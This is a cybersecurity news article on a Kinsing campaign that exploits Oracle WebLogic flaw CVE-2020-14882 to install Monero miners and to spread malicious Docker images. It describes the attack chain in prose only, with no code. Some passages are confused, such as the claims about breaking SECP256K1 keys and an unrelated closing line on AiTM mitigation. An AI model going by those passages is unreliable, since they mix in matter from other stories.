Wednesday, May 7, 2025
HomeCVE/vulnerabilityHackers Exploit WebLogic Vulnerabilities to Deliver Cryptocurrency-Mining Malware

Hackers Exploit WebLogic Vulnerabilities to Deliver Cryptocurrency-Mining Malware

Published on

SIEM as a Service

Follow Us on Google News

In order to deliver cryptocurrency mining malware, the threat actors are actively exploiting both old and newly discovered vulnerabilities in Oracle WebLogic Server.

Recent research by Trend Micro has identified that there is a financially motivated group using Python scripts to exploit the vulnerabilities in Oracle WebLogic Server. 

The Security-Enhanced Linux (SELinux) and other OS security features are disabled by these scripts in order to cripple their functionality. The Kinsing malware has been used to scan vulnerable servers as part of a botnet construction methodology in the past.

- Advertisement - Google News

Technical Analysis

There is still an active weaponization of CVE-2020-14882 by malicious actors even if it is an older vulnerability, as they are still actively gaining a foothold in victim organizations by weaponizing it.

In addition to campaigns against container environments, Kinsing actors have also participated in several others.  

CVE-2020-14882 is one of the vulnerabilities that was weaponized as part of the latest wave of attacks, and it has CVSS score of 9.8. 

This vulnerability is an RCE flaw that has existed for two years. It allows an attacker to gain control of an unpatched server and deploy malicious payloads and codes.

There have been multiple botnets that have exploited this vulnerability in the past on Linux systems infected with the Monero miner as well as the Tsunami backdoor.

The flaw was successfully exploited by deploying a shell script, which led to the successful exploitation of the flaw. A shell script is then executed and a cron job is then used to ensure the persistence of the Kinsing malware by downloading that malware from a remote server.

A number of malicious payloads and malware were allegedly distributed by the following accounts across a variety of channels:-

  • alpineos 
  • sandeep078

Here below we have mentioned all the malicious payloads that are distributed:-

  • Rootkits
  • Kubernetes exploit kits
  • Credential stealers
  • XMRig Monero miners
  • Kinsing malware

Adding to the fact that Docker had been notified about the accounts whose alpineos images were malicious. And not only that even the malicious image had already been downloaded over 150,000 times.

Workload Security Modules

A number of Workload Security modules were used to identify the vulnerability of systems that are vulnerable to CVE-2020-14882. These modules were:-

  • Intrusion prevention system module
  • Antimalware module
  • Web reputation module
  • Activity monitoring module

The whole attack chain is interesting because the attack chain seems to have been designed in a way that makes SECP256K1 encryption easier to break. If the actor succeeded in obtaining the keys to any cryptocurrency wallet with the help of this method, it would give him access to any cryptocurrency wallet. 

Basically, this scheme aims to leverage the computing power of the targets, which is very high, but illegal. It is then necessary to run the ECDLP solver to get the keys.

An organization should configure their REST API exposed to the public with TLS to mitigate the implications of an AiTM attack.

Download Free SWG – Secure Web Filtering – E-book

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

IBM Cognos Analytics Security Vulnerability Allowed Unauthorized File Uploads

 IBM has issued a security bulletin addressing two newly discovered, high-severity vulnerabilities in its...

Critical AWS Amplify Studio Flaw Allowed Attackers to Execute Arbitrary Code

Amazon Web Services (AWS) has addressed a critical security flaw (CVE-2025-4318) in its AWS Amplify...

Severe Kibana Flaw Allowed Attackers to Run Arbitrary Code

A newly disclosed security vulnerability in Elastic’s Kibana platform has put thousands of businesses...

IT Worker from Computacenter Let Girlfriend Into Deutsche Bank’s Restricted Areas

A former information technology manager has filed a whistleblower lawsuit alleging a major security...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

IBM Cognos Analytics Security Vulnerability Allowed Unauthorized File Uploads

 IBM has issued a security bulletin addressing two newly discovered, high-severity vulnerabilities in its...

Critical AWS Amplify Studio Flaw Allowed Attackers to Execute Arbitrary Code

Amazon Web Services (AWS) has addressed a critical security flaw (CVE-2025-4318) in its AWS Amplify...

Severe Kibana Flaw Allowed Attackers to Run Arbitrary Code

A newly disclosed security vulnerability in Elastic’s Kibana platform has put thousands of businesses...